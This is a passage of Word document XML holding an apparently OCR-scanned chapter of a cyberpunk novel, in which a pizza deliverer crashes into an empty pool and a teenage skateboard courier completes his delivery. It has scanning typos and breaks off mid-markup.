          <w:p w14:paraId="23691009" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He's going too slow, lost all his momentum, his timing is off. Where's the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">? Ah, reeled out some line, is following behind again. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> knows that this jerk is in for a big surprise. Can he stay on </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>his !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>@#$ing skateboard while he's being hauled over the flattened remains of some kid's plastic tricycle at a hundred kilometers? We're going to find out.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1098DF25" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> leans back-.the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> can't help watching in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rearvjew</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-leans back like a water skier, pushes off against his board, and swings around beside him, now traveling abreast with him up Heritage Boulevard and slap another sticker goes up, this one on the windshield! It </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>says</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="53B558EB" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F211E56" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>SMOOTH MOVE, EX-LAX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6495C9D1" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="616C4B70" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> has heard of these stickers. It takes hours to get them off. Have to take the car into a detailing place, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pay</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1296F2D7" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">trillions of dollars. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> has two things on his agenda now: He is going to shake this street scum, whatever it takes, and deliver </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>the !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>@#$ing pizza all in the space of</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43EECBD7" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B0ED79D" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>24:23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43727A13" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19C21527" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>the next five minutes and thirty-seven seconds.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B2425F" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">This is it-got to pay more attention to the road-he swings into the side street, no warning, hoping maybe to whipsaw the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> into the street sign on the corner. Doesn't work. The smart ones watch your front tires, they see when you're turning, can't surprise them. Down Strawbridge Place! It seems so long, longer than he remembered-natural when you're in a hurry. Sees the glint of cars up ahead, cars parked sideways to the road-these must be parked in the circle. And there's the house. Light blue vinyl clapboard two-story with one-story garage to the side. He makes that driveway the center of his universe, puts the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> out of his mind, tries not to think about Uncle Enzo, what he's doing right now-in the bath, maybe, or taking a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>crap</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, or making love to some actress, or teaching Sicilian songs to one of his twenty-six granddaughters.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A9221B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The slope of the driveway slams </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>his</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> front suspension halfway up into the engine compartment, but that's what suspensions are for. He evades the car in the driveway-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rnust</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> have visitors tonight, didn't remember that these people drove a Lexus-cuts through the hedge, into the side yard, looks for that shed, that shed he absolutely must not run into</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8E5FB8" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">it's not there, they took it </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>down</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="29FADDA0" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>next problem, the picnic table in the next yard</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18151D6B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>hang on, there's a fence, when did they put up a fence?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D16409F" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>This is no time to put on the brakes. Got to build up some speed, knock it down without blowing all this momentum. It's just a four-foot wooden thing,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BA2126" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The fence goes down easy, he loses maybe ten percent of his speed. But strangely, it looked like an old fence, maybe he made a wrong turn somewhere-he realizes, as he catapults into an empty backyard swimming </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pooL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5496A5B7" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>i6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32604170" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">___________ If it had been full of water, that wouldn't have been so bad, maybe the car would have been saved, he wouldn't </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>owe</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza a new car. But no, he does a Stuka into the far wall of the pool, it sounds more like an explosion than a crash. The airbag inflates, comes back down a second later like a curtain revealing the structure of his new life: he is stuck in a dead car in an empty pool in a TMAWH, the sirens of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> security police are approaching, and there's a pizza behind his head, resting there like the blade of a guillotine, with 25:17 on it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31BB2501" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"Where's it going?" someone says. A woman.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73875D7E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He looks up through the distorted frame of the window, now rimmed with a fractal pattern of crystallized safety glass. It is the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> talking to him. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is not a man, it is a young woman. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>A !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ing teenaged </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>girL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> She is pristine, unhurt. She has skated right down into the pool, she's now oscillating back and forth from one side of the pool to the other, skating up one bank, almost to the lip, turning around, skating down and across and up the opposite side. She is holding her poon in her right hand, the electromagnet reeled up against the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>handle</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> so it looks like some kind of a strange wide-angle intergalactic death ray. Her chest glitters like a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>general's</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> with a hundred little ribbons and medals, except each rectangle is not a ribbon, it is a bar code. A bar code with an ID number that gets her into a different business, highway, or FOQNE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B1AAB94" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1'Yor she says. "Where's the pizza going?"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39350989" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He's going to die and she's </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>gamboling</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42BB8C29" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"White Columns. 5 Oglethorpe Circle," he says.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FFCCDFF" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"I can do that. Open the hatch."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107785F5" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">His heart expands to twice its normal size. Tears come to his eyes. He may live. He presses a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>button</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and the hatch opens.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="545AC512" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">On her next orbit across the bottom of the pool, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kouner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> yanks the pizza out of its slot. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> winces, imagining the garlicky topping accordioning into the back wall of the box. Then she puts it sideways under her arm. It's more than a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> can stand to watch.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39471ECD" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>But she'll get it there. Uncle Enzo doesn't have to apologize for ugly, ruined, cold pizzas, just late ones.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78758173" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"Hey," he says, "take this."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF416F5" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> sticks his black-clad arm out the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>shattered</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="05218A5A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C54DE6" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">window. A white rectangle glows in the dim backyard </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>light</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> a business card. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> snatches it from him on her next orbit, reads it. It </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>says</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="164A5B08" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D92F9BA" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Hiro Protagonist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A833AC6" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Last of the Freelance Hackers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27728E7B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Greatest swordfighter in the world</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D0C246" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Stringer, Central Intelligence Corporation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B9DD1C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Specialising</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in Software related Intel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C644161" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(Music, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Movies  &amp;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Microcode.)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D2D07A6" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">On the back is gibberish explaining how he may be reached: a telephone number. A universal voice phone locator code. A P.O. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>box</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. His address on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>haifa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> dozen electronic communications nets. And an address in the Metaverse.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138B23E1" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"Stupid name," she says, shoving the card into one of a hundred little pockets on her coverall.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BEC2788" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"But you'll never forget it," Hiro says.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB58079" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"If you're a hacker</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>. .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070E634C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"How come I'm delivering pizzas?"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E041D12" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"Right."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDC19CD" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>"Because I'm a freelance hacker. Look, whatever your name is-I owe you one."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD69448" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">"Name's Y.T.," she says, shoving at the pool a few times with one foot, building up more energy. She flies out of the pool as if catapulted, and she's gone. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smartwheels</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of her skateboard, many, many spokes extending and retracting to fit the shape of the ground, take her. across the lawn like a pat of butter </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>slqdding</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> across hot Teflon.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F035A95" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hiro, who as of thirty seconds ago is no longer the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, gets out of the car and pulls his swords out of the trunk, straps them around his body, prepares for a breathtaking nighttime escape run across TMAWH territory. The border with Oakwood Estates is only minutes away, he has the layout memorized (sort of), and he knows how these </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> cops operate, because he used to be one. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> he has a good chance of making it. But it's going to be interesting.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB6EA74" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Above him, in the house that owns the pool, a light has </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>come</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4A4D6CA9" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>i8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174E6770" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
